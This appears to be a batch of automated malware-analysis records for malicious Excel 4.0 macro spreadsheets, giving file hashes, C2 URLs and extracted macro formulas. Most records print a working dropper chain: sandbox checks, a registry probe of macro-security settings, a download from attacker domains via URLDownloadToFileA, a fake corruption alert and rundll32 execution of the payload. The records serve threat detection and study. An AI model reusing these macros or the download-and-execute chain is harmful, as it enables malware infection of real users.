{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a50363b4d9ceb9371110e7477a0fb31e8944d05eb2fa8654ed222fc9c631662"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a50363b4d9ceb9371110e7477a0fb31e8944d05eb2fa8654ed222fc9c631662","filesize":167936,"md5":"35c9b06faf1e116454fc9bd43f6fae59","sha1":"505f554e224ff19db69b4cc07fe9e45c988e7dd0","sha256":"6a50363b4d9ceb9371110e7477a0fb31e8944d05eb2fa8654ed222fc9c631662","sha512":"50f331a6fbfb1065a77ad8f8ce4937c0229304eb6736e8f27264b5726b0871e7da6e335d3d3f4883301dc34416b4424a51f6a4dd2b6e1d4e09615810874cc19d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a50363b4d9ceb9371110e7477a0fb31e8944d05eb2fa8654ed222fc9c631662.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uDf53gxH6e\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a5c80242dc7e2a033fe18c5539771cf6b019b78c7884d56f5e77bece65bd2b9"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a5c80242dc7e2a033fe18c5539771cf6b019b78c7884d56f5e77bece65bd2b9","filesize":185344,"md5":"7b6ce83a7a32c528686717f31e47d5dc","sha1":"06ee618406fc634491d92f7e7b7b6a30b8eb5e30","sha256":"6a5c80242dc7e2a033fe18c5539771cf6b019b78c7884d56f5e77bece65bd2b9","sha512":"ef00efcd1186126ee9e052117b58cf94f92d31746d2197940c54f344a3885d90f0dfe9d1064596d00da2bf2435f4f39b7c8a9e1b4c3db50651ce1d807d9bf494","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a5c80242dc7e2a033fe18c5539771cf6b019b78c7884d56f5e77bece65bd2b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a5d6083d00bc829dbe125b34f57e43aadc190fc1a83f070663df79613a3c9e0"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a5d6083d00bc829dbe125b34f57e43aadc190fc1a83f070663df79613a3c9e0","filesize":206336,"md5":"247476a313b9c33a46f13528f2832ac3","sha1":"473a35156e1eec083c8290e3eb79062ba40d2ce4","sha256":"6a5d6083d00bc829dbe125b34f57e43aadc190fc1a83f070663df79613a3c9e0","sha512":"94f911cbd20da839d9708c59e642829db916c5fe6778a30d2fefdbcaddb043fce1c3088ce16ff13471689e991a329b26299f964934158726d3e78d348f77e4c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a5d6083d00bc829dbe125b34f57e43aadc190fc1a83f070663df79613a3c9e0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uQLGzTp0Uk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a5e295b808ed3700ac004cf5b806b1267240cb8d905b4d914d5dc2a76cb62e9"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a5e295b808ed3700ac004cf5b806b1267240cb8d905b4d914d5dc2a76cb62e9","filesize":209920,"md5":"a95e7f68435cce1988dbfe3d1c0400bc","sha1":"a68f1e93eb191d32cf40c928427046ad44786120","sha256":"6a5e295b808ed3700ac004cf5b806b1267240cb8d905b4d914d5dc2a76cb62e9","sha512":"40f0ab71beeaa8c4ea17be8b21528305a66a69a74d69393eb11d1b5c4d021d00e78d7693cf29bce262397e32b26f43b5a9830a055155b286674646549c859ae4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a5e295b808ed3700ac004cf5b806b1267240cb8d905b4d914d5dc2a76cb62e9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UQLSCu4694\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a7182da8f2e7909dc2f87ce3bf6d5f21c4922cde5b40df86a3bb102e6a07fc6"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a7182da8f2e7909dc2f87ce3bf6d5f21c4922cde5b40df86a3bb102e6a07fc6","filesize":185344,"md5":"13a1ff70def4a64b0d08f41cc92bcdf2","sha1":"135dc8fc2f55a621cfb7a66215dda2ecdecb4453","sha256":"6a7182da8f2e7909dc2f87ce3bf6d5f21c4922cde5b40df86a3bb102e6a07fc6","sha512":"972382d3d02b5cbf8c77e5742363fc75010255f601dd88af27b669dceef8284f440cf14556dc45b29f1386228184b909bb921870c86357b6b8b7f3c771d58cfd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a7182da8f2e7909dc2f87ce3bf6d5f21c4922cde5b40df86a3bb102e6a07fc6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a8603d569fee12306c0da60086552bf5025e26299b76c5ea61052eb5769fb81"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a8603d569fee12306c0da60086552bf5025e26299b76c5ea61052eb5769fb81","filesize":132608,"md5":"711ccc02edf473d71fb75ed7896334fc","sha1":"e1d4246560c6b57ccf658bd6efabf62b167e6ddd","sha256":"6a8603d569fee12306c0da60086552bf5025e26299b76c5ea61052eb5769fb81","sha512":"a32f955ba98e05e002108c0a8bf4ebb0ed4cf3aa1a56a6c45ebaeabcdebb1ccb70311cb8f829c277f9ca01aef6d23623ba86be034c3c73f81203ea20065004f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a8603d569fee12306c0da60086552bf5025e26299b76c5ea61052eb5769fb81.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AdgXZypWb2\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a8a2b58af8b5aa7096ecee623d309ea78f16b3266d1ce079ea34240baa7d74c"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a8a2b58af8b5aa7096ecee623d309ea78f16b3266d1ce079ea34240baa7d74c","filesize":147968,"md5":"c9f2516f161f038480823cb603ff4e19","sha1":"a8cce3b06699106d410f81dacfb3ab2b2578e54c","sha256":"6a8a2b58af8b5aa7096ecee623d309ea78f16b3266d1ce079ea34240baa7d74c","sha512":"c5541b4b3299cf4e8ff98dd273683e8f2e7532406195e25638b4097e5d3b75aef7b67029571a89e9ac52bbabd963586c974d2c7e3627b76cc339c974e04c7a7f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a8a2b58af8b5aa7096ecee623d309ea78f16b3266d1ce079ea34240baa7d74c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"M1mgtYFqKs\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a8b8ccb68e5c231ecd5839444d8bf26e31d58ad2f8d50b9cf577b3fca85023c"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a8b8ccb68e5c231ecd5839444d8bf26e31d58ad2f8d50b9cf577b3fca85023c","filesize":158208,"md5":"9c05165bed422f6f4f5dd79071598562","sha1":"d9cc8b4d33425394fdaed9190f882655db7b7a97","sha256":"6a8b8ccb68e5c231ecd5839444d8bf26e31d58ad2f8d50b9cf577b3fca85023c","sha512":"88e5aea4d86e4d6812dcda5d592bb67be88a55c6ad7dd080e5fe3ece9fdd4066a730bcec782270ea49235e13ef36a373d83878c79d2972bce217cb8b2ba6d7df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a8b8ccb68e5c231ecd5839444d8bf26e31d58ad2f8d50b9cf577b3fca85023c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"AVERAGE(\"?\",523)\nAVERAGE(\"?\",\"?\")\nAVERAGE(\"?\",\"?\")\nAVERAGE(950,1200)\nAVERAGE(\"?\",\"?\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a926ff354c44b0ea9d987dabd4522ecb8c369cc86d23657968c7110fadcf126"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a926ff354c44b0ea9d987dabd4522ecb8c369cc86d23657968c7110fadcf126","filesize":120320,"md5":"00c4d0ba0b5be87c1b1122ddd682ce75","sha1":"0b581a296307d4eaab99e6bd69b108851384b19d","sha256":"6a926ff354c44b0ea9d987dabd4522ecb8c369cc86d23657968c7110fadcf126","sha512":"1ff1fb37d78366d8bc57792abd1bc96f539907ea40b740211c2b9c8976f9fefc740c46e077d22868fa40172ec85eb56dc623c80baf501e47a9ca6c5fe7be2f78","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a926ff354c44b0ea9d987dabd4522ecb8c369cc86d23657968c7110fadcf126.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Mf4BJigIM6\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6ab018bd96c188b63df55540806ae2a803e7559be8d57a24a53541df3c866d64"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6ab018bd96c188b63df55540806ae2a803e7559be8d57a24a53541df3c866d64","filesize":185344,"md5":"bfb588eb8f1bf817936722c9b1c0f02f","sha1":"24678db8b78847240373f82d9b36c7acce041afa","sha256":"6ab018bd96c188b63df55540806ae2a803e7559be8d57a24a53541df3c866d64","sha512":"9cbbdf6f51b76589beadeb38e426a0eaabd4fc541deb311c3d0039237ca2c04f4197a719f36c6642bf0ce6ebef00cc42d50f28d66c823d7672ae8b6636c9611d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6ab018bd96c188b63df55540806ae2a803e7559be8d57a24a53541df3c866d64.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b07d756ecb7ec1d53d1b598685093069adbb45dd60cacb9d8a82f600062ab9e"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b07d756ecb7ec1d53d1b598685093069adbb45dd60cacb9d8a82f600062ab9e","filesize":170496,"md5":"7654ebb15695ec25e1fad5da177e8e32","sha1":"a198f88af13d7faec784ee9c4655c66d8132a334","sha256":"6b07d756ecb7ec1d53d1b598685093069adbb45dd60cacb9d8a82f600062ab9e","sha512":"add5297770f55dd757f90ca6b319a0230fbe9fbc484a514432d770137c693f786d8c58da84defbd275e6fab92b05cb5043c068efe7bf3eb7bb7b9f813d57fd20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b07d756ecb7ec1d53d1b598685093069adbb45dd60cacb9d8a82f600062ab9e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MEc5tawXOx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b33872f6e04189e6a99b98ab71222e6473164079d93b1ea2f46303adc2b6725"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b33872f6e04189e6a99b98ab71222e6473164079d93b1ea2f46303adc2b6725","filesize":144384,"md5":"de3e31cba8f10eeabb3420899bafbb37","sha1":"57ce8485a17f4158a923fa6ae117bff8c0d9608b","sha256":"6b33872f6e04189e6a99b98ab71222e6473164079d93b1ea2f46303adc2b6725","sha512":"3849450554e9f21ec114919b8c876a3201b5c0f9781a3b0e4f1bb47dcc8fd9e5d76bea4ee89fa4474a999ae1b190a59ed1cab955bd5dbf17384b1acb8252d606","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b33872f6e04189e6a99b98ab71222e6473164079d93b1ea2f46303adc2b6725.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ch8AAfNPeB\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b47e06d4ccb066c20af7174ca0c2126fb4530ad1d6d8485250b7e5b866e7213"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b47e06d4ccb066c20af7174ca0c2126fb4530ad1d6d8485250b7e5b866e7213","filesize":160768,"md5":"1a62f8c9397082eaae0a289fdc1569cf","sha1":"459737d34cebcbcfd22a26c0b5b39d8a9b766bfd","sha256":"6b47e06d4ccb066c20af7174ca0c2126fb4530ad1d6d8485250b7e5b866e7213","sha512":"3ce3781d84c497e2479459b349555083a8cb13d2c2f8051d5b101ec0082e6ae89c9fa2fe9c1d3a98f4575cc980eb946c88f4b2594c5e53adc4cdfacc909f55cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b47e06d4ccb066c20af7174ca0c2126fb4530ad1d6d8485250b7e5b866e7213.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XXmBR9dE5T\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b5f3ad5cec2af1692238b46bde4f33cc676a662714957106f986eb9795c3cdf"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b5f3ad5cec2af1692238b46bde4f33cc676a662714957106f986eb9795c3cdf","filesize":185344,"md5":"6a523591d6d1f8b5477ae2f2aa5dfe47","sha1":"8a2a1ff3231d02bf908b997f6d1e9788b7cb6430","sha256":"6b5f3ad5cec2af1692238b46bde4f33cc676a662714957106f986eb9795c3cdf","sha512":"5ed7c02292edc59e37c10160f89c8e6c158f7a273dbfde4bfab59e092afddcc6bde8debbf70f18880596188bfcc78556f8fa91e45b5c5fe4d36669051b0c7f26","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b5f3ad5cec2af1692238b46bde4f33cc676a662714957106f986eb9795c3cdf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b7e450a8f0a36837b96144efcc0ac9177e8126345a981c83d1a1da346210e8b"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b7e450a8f0a36837b96144efcc0ac9177e8126345a981c83d1a1da346210e8b","filesize":167936,"md5":"0cf1381a1f9c24dd9acffe5254b16c65","sha1":"ae6d18a1461729e12edbe597799385718e3cd98e","sha256":"6b7e450a8f0a36837b96144efcc0ac9177e8126345a981c83d1a1da346210e8b","sha512":"9957cc3188ed63d9527a90300082ced0ca0d5cb3f0a32b70b81ff203e3147cb61ce90e85b6b72ce9d99af0292d70426f700515dbfb3bca3b6a20b557cfd14252","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b7e450a8f0a36837b96144efcc0ac9177e8126345a981c83d1a1da346210e8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dL1UNNovZw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b91b765823c780e7283a5154dd80f6d927e28c62f9d59d19d986c0546c3dec4"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b91b765823c780e7283a5154dd80f6d927e28c62f9d59d19d986c0546c3dec4","filesize":185344,"md5":"d7bef43fc56c9b2f400f9188aef2d87b","sha1":"bbd3dedba4d2ff4229ee819258f71f4fb4a62df2","sha256":"6b91b765823c780e7283a5154dd80f6d927e28c62f9d59d19d986c0546c3dec4","sha512":"8242e8d53c6816ec20da8bd8be8652c5a2fc94aafd1000b05a015997df215b62ead4989d221a8c3731649923f23407d7f04f0994fbb699a344b063d6c9effbff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b91b765823c780e7283a5154dd80f6d927e28c62f9d59d19d986c0546c3dec4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
